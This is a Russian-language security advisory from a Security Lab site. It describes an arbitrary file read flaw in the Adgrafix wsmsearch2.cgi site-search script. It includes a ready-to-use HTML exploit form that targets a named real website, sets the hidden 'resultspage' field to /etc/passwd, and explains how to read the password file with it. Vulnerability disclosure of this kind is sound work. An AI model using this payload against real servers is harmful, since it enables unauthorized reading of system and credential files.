Security Lab

Просмотр произвольных файлов в в wsmsearch2.cgi от Adgrafix

Дата публикации:20.02.2004
Всего просмотров:1253
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: wsmsearch2.cgi

Описание: Уязвимость обнаружена в wsmsearch2.cgi от Adgrafix. Удаленный пользователь может просмотреть произвольные файлы на уязвимой системе.

Данный скрипт для выполнения поиска по сайту берет информацию из скрытых полей html-кода. Вот фрагмент кода:

---
<form method=POST action="/cgi-bin/wsmsearch2.cgi">
<B><FONT FACE="Arial,Helvetica"><FONT SIZE=-1>Search Site:</FONT></FONT><br></B>
<input type=text name="terms" size=20> <input type=hidden name=boolean value="AND">
 <input type=hidden name=case value="Insensitive"> <input type=hidden
 name=quicksearch value="NO"> <input type=hidden name=max value="50"> 
<input type=hidden name=faqfile value="/"> <input type=hidden name=resultspage
 value="="/opt2/sdrforum/httpd/htdocs/results.html">
<input type=submit value="Search!">
---
/opt2/sdrforum/httpd/htdocs/results.html - это путь к файлу, в который выводятся результаты поиска
(<input type=hidden name=resultspage value="absolute path to HTML include file">).
Если заменить его на /etc/passwd, то вывод результатов поиска произойдет в него. Так можно просматривать произвольные файлы в системе. эксплоит:

---
<form method=POST action="http://www.sdrforum.org/cgi-bin/wsmsearch2.cgi">
<B><FONT FACE="Arial,Helvetica"><FONT SIZE=-1>Search Site:</FONT></FONT><br></B> 
<input type=text name="terms" size=20> <input type=hidden name=boolean value="AND"> 
<input type=hidden name=case value="Insensitive"> <input type=hidden 
name=quicksearch value="NO"> <input type=hidden name=max value="50"> <input 
type=hidden name=faqfile value="/"> <input type=hidden name=resultspage 
value="/etc/passwd"> 
<input type=submit value="Search!">
---
сохраняем этот код в html файл, задаем слово для поиска, например, root и смотрим passwd.

URL производителя: http://www.adgrafix.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.